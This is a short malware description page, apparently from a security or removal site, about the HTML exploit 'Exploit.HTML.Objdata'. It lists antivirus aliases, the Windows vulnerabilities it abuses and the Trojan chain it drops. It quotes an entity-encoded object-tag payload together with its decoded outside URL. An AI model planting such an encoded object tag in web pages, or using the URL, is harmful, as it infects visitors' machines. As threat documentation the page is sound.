How to delete Exploit.HTML.Objdata - Removal tool, fix instructions

Exploit.HTML.Objdata (Kaspersky Lab) is also known as: Exploit-ObjectData (McAfee), Trojan Horse (Symantec), Exploit:HTML/Objectdata* (RAV), HTML_OBJECTEXP.A (Trend Micro), PMS/Exploit.ObjData (H+BEDV), VBS:Malware (ALWIL), HTML.Daemonize.Loader.A (SOFTWIN) Behavior: Exploit Technical Details: ObjData is an exploit often seen in spam mailings.ObjData attempts to use the Object Type Vulnerability and Two vulnerabilities that could allow an attacker to cause arbitrary code to run on the user's system in MS Windows described in the following Security Bulletins:Microsoft Security Bulletin MS03-032 Microsoft Security Bulletin MS03-040These vulnerabilities are critical since they allow for the execution of random malicious code when users visit specially constructed HTML pages.A sample of code from the end of the file:<objectdata="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#119;&#119;&#119;&#46;&#102;&#97;&#116;&#98;&#111;&#110;&#117;&#115;&#99;&#97;&#115;&#105;&#110;&#111;&#46;&#99;&#111;&#109;&#47;&#112;&#97;&#103;&#101;&#46;&#112;&#104;&#112;">Decryption of above:http://www.fatbonuscasino.com/page.phpOnce users connect to this site a chain of Trojans hits:

  • Trojandropper.VBS.Zerolin which extracts TrojanDropper.Win32.Small.ei from itself and executes it.
  • Small.ei in turn extracts two more Trojans from itself: TrojanNotifier.Win32.Small.d and TrojanProxy.Win32.Daemonize.j.

Removal tool and instruction:
Not available.